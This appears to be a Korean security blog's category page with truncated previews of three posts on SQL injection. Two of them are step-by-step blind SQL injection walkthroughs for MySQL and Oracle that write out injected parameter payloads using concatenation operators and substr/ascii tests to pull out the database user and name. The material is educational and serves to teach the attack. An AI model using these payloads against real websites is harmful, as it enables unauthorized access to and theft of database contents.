본문 바로가기

SQLInjection

(3)
[WEB보안] Blind SQL Injection_if조건문 DB 종류 : MySQL 정상 파라미터 값 : bordid=no0001 ​ bordid=no'||'0001 → 파라미터 값 중간에 연결연산자 입력 후 응답값 확인 ​ bordid=no'||0||'001 bordid=no'||select 0||'001 → 연결연산자 '0'(참) 및 '1'(거짓) 입력 후 응답값 확인 ※ 에러 발생 시 "|| = URL 인코딩" ​ bordid=no'||____||001 1. (select+user()) → user() 값 검색 ​ 2. (substr((select+user()),1,1) → user() 값 첫글자 한글자 요청 ​ 3. (ascii(substr((select+user()),1,1)>100) → user() 값 첫글자 한글자 요청 값이 아스키코드 값으로 100..
[WEB보안] Blind SQL Injection_case wher then 조건문 1. DB 환경 : Oracle ​ 2. 목적 : user 이름 및 Database 이름 확인 ​ 3. 공격 순서 : 1) 정상 파라미터 값 bordid = no0001 ​ 2) 파라미터 값 중간에 연결 연산자 입력 후 응답값 확인 bordid=no0'||'001 ​ 3) 응답 값 확인(참, 거짓) bordid=no0'||0||'001 // 참 bordid=no0'||1||'001 //거짓 ​ 4) SELECT 구문 사용 가능 여부 체크 boardid=no0'||select+0||'001 // 참 boardid=no0'||select+1||'001 //거짓 ​ 5) 연결 연산자 사이에 SQL 구문 삽입 bordid=no0'||______(SQL 구문)_______||001 ​ (1) (select+dat..
[WEB 보안] SQL Injection 취약점 참고 ▶ SQL 인젝션이란? 응용 프로그램 보안 상의 허점을 의도적으로 이용해, 악의적인 SQL문을 실행되게 함으로써 데이터베이스를 비정상적으로 조작하는 코드 인젝션 공격 방법 ​ ※ 출처 : https://ko.wikipedia.org/wiki/SQL_%EC%82%BD%EC%9E%85 ​ ▶ 숨겨진 데이터 검색 서로 다른 범주의 제품을 표시하는 쇼핑 응용 프로그램을 생각해보자. 사용자가 Gifts 카테고리를 클릭하면 브라우저에서 URL을 요청한다. https://insecure-website.com/products?category=Gifts